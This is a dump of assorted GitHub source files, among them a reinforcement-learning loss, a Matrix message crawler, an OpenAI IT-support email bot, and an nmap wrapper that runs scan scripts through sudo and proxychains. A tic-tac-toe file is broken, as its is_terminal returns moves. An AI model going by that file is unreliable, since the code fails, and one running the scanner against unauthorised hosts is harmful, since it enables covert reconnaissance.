\"\"\"\n config = policy.config\n\n # Construct internal state inputs.\n i = 0\n state_batches = []\n while \"state_in_{}\".format(i) in train_batch:\n state_batches.append(train_batch[\"state_in_{}\".format(i)])\n i += 1\n assert state_batches\n\n # Q-network evaluation (at t).\n q, _, _, _ = compute_q_values(\n policy,\n model,\n train_batch,\n state_batches=state_batches,\n seq_lens=train_batch.get(SampleBatch.SEQ_LENS),\n explore=False,\n is_training=True,\n )\n\n # Target Q-network evaluation (at t+1).\n q_target, _, _, _ = compute_q_values(\n policy,\n policy.target_model,\n train_batch,\n state_batches=state_batches,\n seq_lens=train_batch.get(SampleBatch.SEQ_LENS),\n explore=False,\n is_training=True,\n )\n\n if not hasattr(policy, \"target_q_func_vars\"):\n policy.target_q_func_vars = policy.target_model.variables()\n\n actions = tf.cast(train_batch[SampleBatch.ACTIONS], tf.int64)\n dones = tf.cast(train_batch[SampleBatch.TERMINATEDS], tf.float32)\n rewards = train_batch[SampleBatch.REWARDS]\n weights = tf.cast(train_batch[PRIO_WEIGHTS], tf.float32)\n\n B = tf.shape(state_batches[0])[0]\n T = tf.shape(q)[0] // B\n\n # Q scores for actions which we know were selected in the given state.\n one_hot_selection = tf.one_hot(actions, policy.action_space.n)\n q_selected = tf.reduce_sum(\n tf.where(q > tf.float32.min, q, tf.zeros_like(q)) * one_hot_selection, axis=1\n )\n\n if config[\"double_q\"]:\n best_actions = tf.argmax(q, axis=1)\n else:\n best_actions = tf.argmax(q_target, axis=1)\n\n best_actions_one_hot = tf.one_hot(best_actions, policy.action_space.n)\n q_target_best = tf.reduce_sum(\n tf.where(q_target > tf.float32.min, q_target, tf.zeros_like(q_target))\n * best_actions_one_hot,\n axis=1,\n )\n\n if config[\"num_atoms\"] > 1:\n raise ValueError(\"Distributional R2D2 not supported yet!\")\n else:\n q_target_best_masked_tp1 = (1.0 - dones) * tf.concat(\n [q_target_best[1:], tf.constant([0.0])], axis=0\n )\n\n if config[\"use_h_function\"]:\n h_inv = h_inverse(q_target_best_masked_tp1, config[\"h_function_epsilon\"])\n target = h_function(\n rewards + config[\"gamma\"] ** config[\"n_step\"] * h_inv,\n config[\"h_function_epsilon\"],\n )\n else:\n 
target = (\n rewards + config[\"gamma\"] ** config[\"n_step\"] * q_target_best_masked_tp1\n )\n\n # Seq-mask all loss-related terms.\n seq_mask = tf.sequence_mask(train_batch[SampleBatch.SEQ_LENS], T)[:, :-1]\n # Mask away also the burn-in sequence at the beginning.\n burn_in = policy.config[\"replay_buffer_config\"][\"replay_burn_in\"]\n # Making sure, this works for both static graph and eager.\n if burn_in > 0:\n seq_mask = tf.cond(\n pred=tf.convert_to_tensor(burn_in, tf.int32) < T,\n true_fn=lambda: tf.concat(\n [tf.fill([B, burn_in], False), seq_mask[:, burn_in:]], 1\n ),\n false_fn=lambda: seq_mask,\n )\n\n def reduce_mean_valid(t):\n return tf.reduce_mean(tf.boolean_mask(t, seq_mask))\n\n # Make sure to use the correct time indices:\n # Q(t) - [gamma * r + Q^(t+1)]\n q_selected = tf.reshape(q_selected, [B, T])[:, :-1]\n td_error = q_selected - tf.stop_gradient(tf.reshape(target, [B, T])[:, :-1])\n td_error = td_error * tf.cast(seq_mask, tf.float32)\n weights = tf.reshape(weights, [B, T])[:, :-1]\n policy._total_loss = reduce_mean_valid(weights * huber_loss(td_error))\n # Store the TD-error per time chunk (b/c we need only one mean\n # prioritized replay weight per stored sequence).\n policy._td_error = tf.reduce_mean(td_error, axis=-1)\n policy._loss_stats = {\n \"mean_q\": reduce_mean_valid(q_selected),\n \"min_q\": tf.reduce_min(q_selected),\n \"max_q\": tf.reduce_max(q_selected),\n \"mean_td_error\": reduce_mean_valid(td_error),\n }\n\n return policy._total_loss\n\n\ndef h_function(x, epsilon=1.0):\n \"\"\"h-function to normalize target Qs, described in the paper [1].\n\n h(x) = sign(x) * [sqrt(abs(x) + 1) - 1] + epsilon * x\n\n Used in [1] in combination with h_inverse:\n targets = h(r + gamma * h_inverse(Q^))\n \"\"\"\n return tf.sign(x) * (tf.sqrt(tf.abs(x) + 1.0) - 1.0) + epsilon * x\n\n\ndef h_inverse(x, epsilon=1.0):\n \"\"\"Inverse if the above h-function, described in the paper [1].\n\n If x > 0.0:\n h-1(x) = [2eps * x + (2eps + 1) - sqrt(4eps x + (2eps + 1)^2)] /\n (2 * eps^2)\n\n If x < 0.0:\n h-1(x) = [2eps * x + (2eps + 1) + sqrt(-4eps x + (2eps + 1)^2)] /\n (2 * eps^2)\n \"\"\"\n two_epsilon = epsilon * 2\n if_x_pos = (\n two_epsilon * x\n + (two_epsilon + 1.0)\n - tf.sqrt(4.0 * epsilon * x + (two_epsilon + 1.0) ** 2)\n ) / (2.0 * epsilon**2)\n if_x_neg = (\n two_epsilon * x\n - (two_epsilon + 1.0)\n + tf.sqrt(-4.0 * epsilon * x + (two_epsilon + 1.0) ** 2)\n ) / (2.0 * epsilon**2)\n return tf.where(x < 0.0, if_x_neg, if_x_pos)\n\n\nclass ComputeTDErrorMixin:\n \"\"\"Assign the `compute_td_error` method to the R2D2TFPolicy\n\n This allows us to prioritize on the worker side.\n \"\"\"\n\n def __init__(self):\n def compute_td_error(\n obs_t, act_t, rew_t, obs_tp1, terminateds_mask, importance_weights\n ):\n input_dict = self._lazy_tensor_dict({SampleBatch.CUR_OBS: obs_t})\n input_dict[SampleBatch.ACTIONS] = act_t\n input_dict[SampleBatch.REWARDS] = rew_t\n input_dict[SampleBatch.NEXT_OBS] = obs_tp1\n input_dict[SampleBatch.TERMINATEDS] = terminateds_mask\n input_dict[PRIO_WEIGHTS] = importance_weights\n\n # Do forward pass on loss to update td error attribute\n r2d2_loss(self, self.model, None, input_dict)\n\n return self._td_error\n\n self.compute_td_error = compute_td_error\n\n\ndef get_distribution_inputs_and_class(\n policy: Policy,\n model: ModelV2,\n *,\n input_dict: ModelInputDict,\n state_batches: Optional[List[TensorType]] = None,\n seq_lens: Optional[TensorType] = None,\n explore: bool = True,\n is_training: bool = False,\n **kwargs\n) -> Tuple[TensorType, 
type, List[TensorType]]:\n\n if policy.config[\"framework\"] == \"torch\":\n from ray.rllib.algorithms.r2d2.r2d2_torch_policy import (\n compute_q_values as torch_compute_q_values,\n )\n\n func = torch_compute_q_values\n else:\n func = compute_q_values\n\n q_vals, logits, probs_or_logits, state_out = func(\n policy, model, input_dict, state_batches, seq_lens, explore, is_training\n )\n\n policy.q_values = q_vals\n if not hasattr(policy, \"q_func_vars\"):\n policy.q_func_vars = model.variables()\n\n action_dist_class = (\n TorchCategorical if policy.config[\"framework\"] == \"torch\" else Categorical\n )\n\n return policy.q_values, action_dist_class, state_out\n\n\ndef adam_optimizer(\n policy: Policy, config: AlgorithmConfigDict\n) -> \"tf.keras.optimizers.Optimizer\":\n return tf1.train.AdamOptimizer(\n learning_rate=policy.cur_lr, epsilon=config[\"adam_epsilon\"]\n )\n\n\ndef build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]:\n return dict(\n {\n \"cur_lr\": policy.cur_lr,\n },\n **policy._loss_stats\n )\n\n\ndef setup_early_mixins(\n policy: Policy, obs_space, action_space, config: AlgorithmConfigDict\n) -> None:\n LearningRateSchedule.__init__(policy, config[\"lr\"], config[\"lr_schedule\"])\n\n\ndef before_loss_init(\n policy: Policy,\n obs_space: gym.spaces.Space,\n action_space: gym.spaces.Space,\n config: AlgorithmConfigDict,\n) -> None:\n ComputeTDErrorMixin.__init__(policy)\n\n\ndef setup_late_mixins(\n policy: Policy,\n obs_space: gym.spaces.Space,\n action_space: gym.spaces.Space,\n config: AlgorithmConfigDict,\n) -> None:\n TargetNetworkMixin.__init__(policy)\n\n\nR2D2TFPolicy = build_tf_policy(\n name=\"R2D2TFPolicy\",\n loss_fn=r2d2_loss,\n get_default_config=lambda: ray.rllib.algorithms.r2d2.r2d2.R2D2Config(),\n postprocess_fn=postprocess_nstep_and_prio,\n stats_fn=build_q_stats,\n make_model=build_r2d2_model,\n action_distribution_fn=get_distribution_inputs_and_class,\n optimizer_fn=adam_optimizer,\n extra_action_out_fn=lambda policy: {\"q_values\": policy.q_values},\n compute_gradients_fn=clip_gradients,\n extra_learn_fetches_fn=lambda policy: {\"td_error\": policy._td_error},\n before_init=setup_early_mixins,\n before_loss_init=before_loss_init,\n after_init=setup_late_mixins,\n mixins=[\n TargetNetworkMixin,\n ComputeTDErrorMixin,\n LearningRateSchedule,\n ],\n)\n","repo_name":"ray-project/ray","sub_path":"rllib_contrib/r2d2/src/rllib_r2d2/r2d2/r2d2_tf_policy.py","file_name":"r2d2_tf_policy.py","file_ext":"py","file_size_in_byte":11627,"program_lang":"python","lang":"en","doc_type":"code","stars":28715,"dataset":"github-code","pt":"86"} +{"seq_id":"1563223226","text":"from apiconfig.config import settings\nfrom database.core import Base\nfrom database.utils import DateTimeUtcNow, pre_populate_from_tsv\nfrom sqlalchemy import Column, ForeignKey, Integer, Sequence, String\nfrom sqlalchemy.event import listens_for\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.types import DateTime\n\n\nclass GoogleUser(Base):\n __tablename__ = \"google_user\"\n\n id = Column(\n Integer,\n Sequence(\"google_user_id_seq\", start=3, increment=1),\n primary_key=True,\n index=True,\n )\n user_id = Column(Integer, ForeignKey(\"user.id\", ondelete=\"CASCADE\"), nullable=False)\n email = Column(String)\n sub = Column(String, unique=True)\n\n picture = Column(String(500), nullable=True)\n\n fullname = Column(String(100), nullable=True)\n given_name = Column(String(50), nullable=True)\n family_name = Column(String(50), nullable=True)\n\n date_created = Column(DateTime, 
nullable=False, server_default=DateTimeUtcNow())\n\n role_id = Column(Integer, ForeignKey(\"role.id\"), nullable=False)\n role = relationship(\"Role\")\n\n\n@listens_for(GoogleUser.__table__, \"after_create\")\ndef pre_populate_google_user(target, connection, **kw):\n pre_populate_from_tsv(settings.db.initial_data_dir / \"google_user.tsv\", target, connection)\n","repo_name":"deeppavlov/dream-builder","sub_path":"database/models/google_user/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"86"} +{"seq_id":"32271848849","text":"from matrix_client.api import MatrixHttpApi\nfrom matrix_client.client import MatrixClient\nfrom matrix_client.room import Room\n\nclass CrawlerMatrixClient:\n def __init__(self, token, server, roomid):\n self.server = server\n self.roomid = roomid\n self.token = token\n self.APIWrapper = MatrixHttpApi(\"https://{}\".format(self.server), token=self.token)\n self.next_batch = self.APIWrapper.sync().get(\"next_batch\")\n print(\"client initialized\")\n def getChunk(self):\n b = self.APIWrapper.get_room_messages(self.roomid, self.next_batch, \"b\", limit=100)\n c = b.get(\"chunk\")\n self.next_batch = b.get(\"end\")\n return c\n def dump_message_events(self, message_count, output_file):\n events = []\n try:\n message_count = self.try_recover_suspend(output_file, events, message_count)\n except:\n pass\n try:\n count = message_count // 100\n for progress in range(count):\n chunk = self.getChunk()\n for element in chunk:\n events.append(element.get(\"origin_server_ts\"))\n print(\"haha progress bar go brr {} out of {}\".format(progress, count), end='\\r')\n with open(output_file, \"w+\") as handle:\n for element in events:\n handle.write(str(element))\n handle.write(\"\\n\")\n except KeyboardInterrupt:\n self.suspend(events, output_file)\n def try_recover_suspend(self, output_file, events, message_count):\n with open(output_file, \"r\") as handle:\n a = handle.readlines()\n if a[len(a)-1] == \"sus\":\n print(\"restoring from suspend\")\n self.next_batch = a[len(a)-2]\n a = a[:-2]\n for element in a:\n events.append(element.strip())\n return message_count - len(a) + 1 \n\n def suspend(self, processed_events, output_file):\n print(\"suspending to output_file\")\n with open(output_file, \"w+\") as handle:\n for element in processed_events:\n handle.write(str(element))\n handle.write(\"\\n\")\n handle.write(self.next_batch)\n handle.write(\"\\n\")\n handle.write(\"sus\")\nif __name__ == \"__main__\":\n Client = CrawlerMatrixClient(open(\"secret.txt\", \"r\").read(), \"matrix.org\", \"!KIwsdPeEnTTmPnMpMv:fam-ribbers.com\")\n Client.dump_message_events(400000, \"the_grand_dump_mainl1ne\")","repo_name":"nergzd723/matrix-data-crawler","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"71878714525","text":"import matplotlib.pyplot as plt\r\nimport matplotlib as mpl\r\nimport numpy as np\r\n\r\nplt.figure(figsize = (5,7))\r\n\r\nplt.subplot()\r\n\r\nfig = plt.figure(figsize=(5,7))\r\nspec = fig.add_gridspec(ncols=1, nrows=2, height_ratios=[5,2])\r\n\r\nax1 = fig.add_subplot(spec[0,0])\r\nplt.title('infection simulation')\r\n\r\nax2 = fig.add_subplot(spec[1,0])\r\nax2.set_title('number of infected')\r\n#ax2.set_xlim(0, 
simulation_steps)\r\n\r\nax1.clear()\r\nax2.clear()\r\n\r\n\r\nplt.show()","repo_name":"bodleim/matplotlibExample","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"41779158947","text":"import csv\nimport httplib2\nimport lxml\nimport os\nimport sys\nimport time\nfrom bs4 import BeautifulSoup\nfrom rdflib import Graph, Literal, Namespace, URIRef\nfrom rdflib.namespace import RDFS\nfrom rdflib.plugins.serializers.nt import NTSerializer\nfrom tqdm import tqdm\n\ngPlaces = Graph()\ngn = Namespace('http://www.geonames.org/ontology#')\nwgs84_pos = Namespace('http://www.w3.org/2003/01/geo/wgs84_pos#')\n\nfilePath_1 = sys.argv[1]\n\nwith open(filePath_1, newline=None) as f1:\n reader = csv.reader(f1, dialect='excel', delimiter=',', quotechar='\"')\n next(reader, None) # skip the headers\n geoURIs = list(reader)\n for item in tqdm(geoURIs, desc='Getting GeoNames data', total=len(geoURIs)):\n if not item:\n continue\n geoURI = item[0]\n uri = ''.join([geoURI, 'about.rdf'])\n h = httplib2.Http()\n resp, rdf_doc = h.request(uri, \"GET\")\n time.sleep(1)\n soup = BeautifulSoup(rdf_doc, \"xml\")\n\n for tag in soup.find_all(\"name\"):\n name = tag.text\n gPlaces.add( (URIRef(geoURI), RDFS.label, Literal(name)) )\n\n for tag in soup.find_all(\"parentCountry\"):\n country = tag.attrs['rdf:resource']\n gPlaces.add( (URIRef(geoURI), gn.parentCountry, URIRef(country) ) )\n\n for tag in soup.find_all(\"lat\"):\n lat = tag.text\n gPlaces.add( (URIRef(geoURI), wgs84_pos.lat, Literal(lat)) )\n\n for tag in soup.find_all(\"long\"):\n long = tag.text\n gPlaces.add( (URIRef(geoURI), wgs84_pos.long, Literal(long)) )\n\nplaces_graph_path = os.path.join(\n os.path.dirname(__file__), os.pardir, 'Graphs', 'placesGraph.nt')\n\ngPlaces.bind(\"gn\", gn)\ngPlaces.bind(\"rdfs\", RDFS)\ngPlaces.bind(\"wgs84_pos\", wgs84_pos)\n\ngPlaces = gPlaces.serialize(destination=places_graph_path, format='nt', encoding='utf-8')\n\nprint('Finished getting geo info')\n","repo_name":"CarnegieHall/linked-data","sub_path":"scripts/get_geoInfo.py","file_name":"get_geoInfo.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"86"} +{"seq_id":"6385551254","text":"import numpy as N\nimport pylab as P\n\ndx = (0.663, 0.007) #X start position, X width\ndy = (-0.191, 0.007) #Y start position, Y width\nv = N.zeros((1024,1024), \"uint8\") #The color matrix\n\n#Create the const. 
matrix and initialize\nc = N.zeros((1024,1024), \"complex\")\nc[:].real = N.linspace(dy[0],dy[0]+dy[1],\n             c.shape[0])[:,N.newaxis]\nc[:].imag = N.linspace(dx[0],dx[0]+dx[1],\n             c.shape[1])[N.newaxis,:]\nz = c.copy() # The z function is initialized from c\nfor it in range(256): # Use 256 colors\n    z *= z # Compute z = z*z\n    z += c # Compute z = z + c\n    # Set colors for which z has diverged\n    v += (N.abs(z) >= 4)*(v == 0)*it\nP.imshow(v) # Display the image\nP.show()","repo_name":"odGit/fractals_python","sub_path":"mandel2.py","file_name":"mandel2.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"24138348707","text":"def minmax_decision(state):\n\n    def max_value(state):\n        if is_terminal(state):\n            return utility_of(state)\n        v = -infinity\n        for (a, s) in successors_of(state):\n            v = max(v, min_value(s))\n            print('V: ' + str(v))\n        return v\n\n    def min_value(state):\n        if is_terminal(state):\n            return utility_of(state)\n        v = infinity\n        for (a, s) in successors_of(state):\n            v = min(v, max_value(s))\n        return v\n\n    infinity = float('inf')\n    action, state = argmax(successors_of(state), lambda a: min_value(a[1]))\n    return action\n\n\ndef is_terminal(state):\n    \"\"\"\n    returns True if the state is either a win or a tie (board full)\n    :param state: State of the checkerboard. 
Ex: [0; 1; 2; 3; X; 5; 6; 7; 8]\n :return:\n \"\"\"\n\n successors = []\n player_token = \"\"\n\n xCount = state.count(\"X\")\n oCount = state.count(\"O\")\n\n if xCount == oCount:\n # X's turn\n player_token = \"X\"\n else:\n # O's turn\n player_token = \"O\"\n \n # check every field\n for i in state:\n # if it is empty we can make a move by placing a token\n if i != \"X\" and i != \"O\":\n s = list.copy(state)\n s[i] = player_token\n moveState = (i, s)\n successors.append(moveState)\n\n return successors\n\n\ndef display(state):\n print(\"-----\")\n for c in [0, 3, 6]:\n print(state[c + 0], state[c + 1], state[c + 2])\n\n\ndef main():\n board = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n while not is_terminal(board):\n board[minmax_decision(board)] = 'X'\n if not is_terminal(board):\n display(board)\n board[int(input('Your move? '))] = 'O'\n display(board)\n\n\ndef argmax(iterable, func):\n return max(iterable, key=func)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"antje12/4-Artificial-Intelligence","sub_path":"Lab 5 - Adversarial search/Exercises/tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"39081893318","text":"import openai\n\nwith open('apikey.txt', 'r') as f:\n API_KEY: str = f.read().strip()\n\nopenai.api_key = API_KEY\n\ncommon_prompt = \"You work for the IT department. \" \\\n \"Be verbose in your response. Clarify all of your thinking, and show all of your work. \" \\\n \"Be as descriptive as possible as to why you are making certain choices or assumptions. \" \\\n \"Use logical chain of thought as much as possible. \" \\\n \"Utilize all clues given so far to uncover any potential issues, being genius, clever, and brilliant.\" \\\n \"Have all of your output be in Markdown format. \"\n\nemail_analyzer_prompt = \"You are an email analyzer bot specialized in understanding and extracting information from \" \\\n \"technical support emails. Analyze the given email, identify the context, main issue, \" \\\n \"any relevant details, and any missing information. Provide a clear and concise summary of \" \\\n \"the problem and its context. Example: 'The user is facing issues with Wi-Fi connectivity at \" \\\n \"their office and needs assistance in fixing it.' \"\n\ntroubleshooting_bot_prompt = \"You are a troubleshooting bot that provides step-by-step guidance based on the problem \" \\\n \"summary given by the Email Analyzer Bot. Generate a list of troubleshooting steps that \" \\\n \"can help the user resolve the issue they're facing. Be specific and clear in your \" \\\n \"instructions, and consider different possible causes for the issue. Example: '1. Check \" \\\n \"if the Wi-Fi is turned on. 2. Restart the router and try reconnecting. 3. Check if \" \\\n \"other devices can connect to the same Wi-Fi network.' \"\n\nit_specialist_bot_prompt = \"You are an IT specialist bot that analyzes technical issues from a broader IT \" \\\n \"perspective. Using the problem summary from the Email Analyzer Bot, provide any \" \\\n \"additional insights or suggestions that could help resolve the issue, taking into account \"\\\n \"hardware, software, and potential compatibility issues. Example: 'The user might want to \" \\\n \"check if their device's network drivers are up-to-date, as outdated drivers could cause \" \\\n \"connectivity issues.' 
\"\n\nnetworking_specialist_bot_prompt = \"You are a networking specialist bot that analyzes technical issues specifically \" \\\n \"related to networking. Based on the problem summary from the Email Analyzer Bot, \" \\\n \"provide any additional insights or suggestions that could help resolve the issue, \"\\\n \"taking into account network configuration, equipment, and potential interference \" \\\n \"sources. Example: 'The user should check if there's any physical obstruction or \" \\\n \"electronic devices causing interference near the router, as this might affect the \"\\\n \"Wi-Fi signal.' \"\n\nsummary_and_decision_bot_prompt = \"You are a summary and decision bot that consolidates information from multiple \" \\\n \"specialized bots to determine the best course of action. Review the information \" \\\n \"provided by the Email Analyzer, Troubleshooting, IT Specialist, and Networking \" \\\n \"Specialist bots. Summarize their inputs and recommend the most effective solution \" \\\n \"and reply to the user, taking into account all perspectives and suggestions. \" \\\n \"Example: 'Based on the inputs from all bots, the user should first try the \" \\\n \"troubleshooting steps, check their device's network drivers, and ensure there's no \"\\\n \"interference near the router. A suggested reply to the user would include these \" \\\n \"recommendations.' \"\n\n\n# Define the email content\nemail_title = input(\"Email Title: \")\nemail_body = input(\"Email Body:\")\nemail = f\"Title: {email_title}\\nBody: {email_body}\"\n\n# Email Analyzer Bot\nanalyzer_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{email_analyzer_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": email}\n ]\n)\n\nanalyzer_response_formatted = f\"Email Analyzer Bot: {analyzer_response['choices'][0]['message']['content']}\"\n\nprint(analyzer_response_formatted)\n\n# Troubleshooting Bot\ntroubleshooting_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{troubleshooting_bot_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": f\"{email}\\n\"\n f\"{analyzer_response_formatted}\"}]\n)\n\ntroubleshooting_response_formatted = f\"Troubleshooting Bot:\" \\\n f\"{troubleshooting_response['choices'][0]['message']['content']}\"\n\nprint(troubleshooting_response_formatted)\n\n# IT Specialist Bot\nit_specialist_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{it_specialist_bot_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": f\"{email}\\n\"\n f\"{analyzer_response_formatted}\\n\"\n f\"{troubleshooting_response_formatted}\"}]\n)\n\nit_specialist_response_formatted = f\"IT Specialist Bot: {it_specialist_response['choices'][0]['message']['content']}\"\n\nprint(it_specialist_response_formatted)\n\n# Networking Specialist Bot\nnetworking_specialist_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{networking_specialist_bot_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": f\"{email}\\n\"\n f\"{analyzer_response_formatted}\\n\"\n f\"{troubleshooting_response_formatted}\\n\"\n f\"{it_specialist_response_formatted}\"}\n ]\n)\n\nnetworking_specialist_response_formatted = \\\n f\"Networking Specialist Bot: 
{networking_specialist_response['choices'][0]['message']['content']}\"\n\nprint(networking_specialist_response_formatted)\n\n# Summary and Decision Bot\nsummary_decision_response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=[\n {\"role\": \"system\", \"content\": f\"{summary_and_decision_bot_prompt} {common_prompt}\"},\n {\"role\": \"user\", \"content\": f\"{email}\\n\"\n f\"{analyzer_response_formatted}\\n\"\n f\"{troubleshooting_response_formatted}\\n\"\n f\"{it_specialist_response_formatted}\\n\"\n f\"{networking_specialist_response_formatted}\"}]\n)\n\nsummary_decision_response_formatted = \\\n f\"Summary and Decision Bot: {summary_decision_response['choices'][0]['message']['content']}\"\n\n# Print the final response from the Summary and Decision Bot\nprint(summary_decision_response_formatted)\n","repo_name":"randomdavis/email_it_bot","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"21581143365","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Jan 5 00:00:00 2020\n\n@author: Andrew Mashhadi\n\"\"\"\n\n#%%\nimport numpy as np\nimport matplotlib.image as mpimg\n\n#%% Q1\na = mpimg.imread('a.jpg')\nb = mpimg.imread('b.jpg')\n\nfrom_y = (a.shape[0] - b.shape[0]) // 2\nto_y = (a.shape[0] + b.shape[0]) // 2\n\nfrom_x = (a.shape[1] - b.shape[1]) // 2\nto_x = (a.shape[1] + b.shape[1]) // 2\n\nc = a.copy()\nc[from_y:to_y, from_x:to_x, :] = b\n\nmpimg.imsave('c.jpg', c)\n\n#%% Q2\nd = mpimg.imread('d.jpg')\ne = mpimg.imread('e.jpg')\n\nabs_diff = np.abs(d.astype(np.int32) - e.astype(np.int32))\nf = abs_diff.astype(np.uint8)\n\nmpimg.imsave('f.jpg', f)\n\n#%% Q3\nminion = mpimg.imread('g.jpg')\nshugga = mpimg.imread('h.jpg')\n\ni = shugga.copy()\ntop_m = i.shape[0] - minion.shape[0]\nleft_m = (i.shape[1] - minion.shape[1]) // 2\nright_m = (i.shape[1] + minion.shape[1]) // 2\nsub_i = i[top_m:, left_m:right_m, :]\n\nL1 = minion[:,:,0] <= 80\nL2 = 180 <= minion[:,:,1]\nL3 = minion[:,:,2] <= 60\nbgPxls = L1 & L2 & L3\n\nsub_i[~bgPxls] = minion[~bgPxls]\n\nmpimg.imsave('i.jpg', i)","repo_name":"andrewmashhadi/Python_For_Applications","sub_path":"Assignment #5/hw5.py","file_name":"hw5.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"3183195029","text":"import subprocess\nimport defusedxml.ElementTree\nimport os.path\n\nfrom . 
import base\n\nNMAP_CMD=\"/usr/bin/nmap\"\nSUDO_CMD=\"/usr/bin/sudo\"\nTIMEOUT_CMD=\"/usr/bin/timeout\"\n\nclass NmapScript(object):\n    cmd=NMAP_CMD\n    script_name=\"\"\n\n    def _argv(self,hostadr,port,**kwargs):\n        argv=[\n            \"-oX\",\n            \"-\",\n            \"-Pn\",\n            \"-p\",\n            str(port),\n            \"--script\",\n            self.script_name,\n            hostadr\n        ]\n        return argv\n\n    def __call__(self,hostadr,port,**kwargs):\n        argv=self._argv(hostadr,port,**kwargs)\n        cmd=[self.cmd]+argv\n        kwargs_c={\n            \"capture_output\": True,\n            \"timeout\": 60\n        }\n\n        if \"proxychains\" in kwargs and kwargs[\"proxychains\"] is not None:\n            cmd=[\"proxychains\"]+cmd\n            kwargs_c[\"cwd\"]=kwargs[\"proxychains\"]\n\n        print(cmd)\n\n        compl=subprocess.run(\n            cmd,\n            **kwargs_c,\n            #capture_output=True,\n            #timeout=60\n        )\n\n        if compl.returncode!=0:\n            raise base.CommandError(compl.returncode,compl.stderr,compl.stdout)\n\n        err=compl.stderr.decode()\n        out=compl.stdout.decode()\n        root=defusedxml.ElementTree.fromstring(out)\n        data=self._out_parser(root)\n        \n        return data\n\n    def _out_parser(self,tree):\n        ret={\n            \"info\": {\n                \"nmaprun\": tree.attrib\n            },\n            \"hosts\": [],\n        }\n        for ch in tree:\n            if ch.tag==\"runstats\":\n                ret[\"info\"][\"runstats\"]={}\n                for ch1 in ch:\n                    ret[\"info\"][\"runstats\"][ch1.tag]=ch1.attrib\n                continue\n            if ch.tag!=\"host\":\n                ret[\"info\"][ch.tag]=ch.attrib\n                continue\n            ret[\"hosts\"].append(self._host(ch))\n        return ret\n\n    def _host(self,elem):\n        ret={\n            \"info\": elem.attrib,\n            \"ports\": []\n        }\n        for ch in elem:\n            if ch.tag!=\"ports\":\n                ret[ch.tag]=ch.attrib\n                continue\n            for subch in ch:\n                ret[\"ports\"].append(self._port(subch))\n        return ret\n\n    def _port(self,elem):\n        ret={\n            \"info\": elem.attrib,\n        }\n        for ch in elem:\n            if ch.tag!=\"script\":\n                ret[ch.tag]=ch.attrib\n                continue\n            ret[ch.tag]=ch.attrib[\"id\"]\n            for subch in ch:\n                ret=self._script_child(ret,subch)\n        return ret\n\n    def _script_child(self,ret,child):\n        return ret\n\nclass NmapScriptUdp(NmapScript):\n    sudo=SUDO_CMD\n    timeout=60\n    timeout_cmd=TIMEOUT_CMD\n\n    def _proxychains_to_proxy(self,proxychains):\n        if proxychains is None: return None\n        fname=os.path.join(proxychains,'proxychains.conf')\n        with open(fname) as fd:\n            for r in fd.readlines():\n                r=r.strip()\n                if r.startswith('socks5'):\n                    t=r.split()\n                    # nmap wants socks4\n                    return \"socks4://%s:%s\" % (t[1],t[2]) \n        return None\n\n\n    def _argv(self,hostadr,port,**kwargs):\n        argv=NmapScript._argv(self,hostadr,port,**kwargs)\n        argv+=['-sU']\n        if \"proxychains\" in kwargs and kwargs[\"proxychains\"] is not None:\n            proxy=self._proxychains_to_proxy(kwargs[\"proxychains\"])\n            if proxy is not None:\n                argv+=[\n                    \"--proxies\",\n                    proxy\n                ]\n        return argv\n\n    def __call__(self,hostadr,port,**kwargs):\n        argv=self._argv(hostadr,port,**kwargs)\n\n        cmd=[\n            self.sudo,\n            self.timeout_cmd,\n            str(self.timeout),\n            self.cmd\n        ]+argv\n\n        kwargs_c={\n            \"capture_output\": True\n        }\n\n        print(cmd)\n\n        compl=subprocess.run(\n            cmd,\n            **kwargs_c\n        )\n\n        if compl.returncode!=0:\n            raise base.CommandError(compl.returncode,compl.stderr,compl.stdout)\n\n        err=compl.stderr.decode()\n        out=compl.stdout.decode()\n        root=defusedxml.ElementTree.fromstring(out)\n        data=self._out_parser(root)\n        \n        return data\n\n\n# nmap http\n\nclass NmapScriptHttp(NmapScript):\n\n    def _argv(self,hostadr,port,**kwargs):\n        argv=[\n            \"-oX\",\n            \"-\",\n            \"-Pn\",\n            \"-p\",\n            str(port),\n            \"--script\",\n            self.script_name,\n        ]\n        \n        if \"servername\" in kwargs and kwargs[\"servername\"] is not None:\n            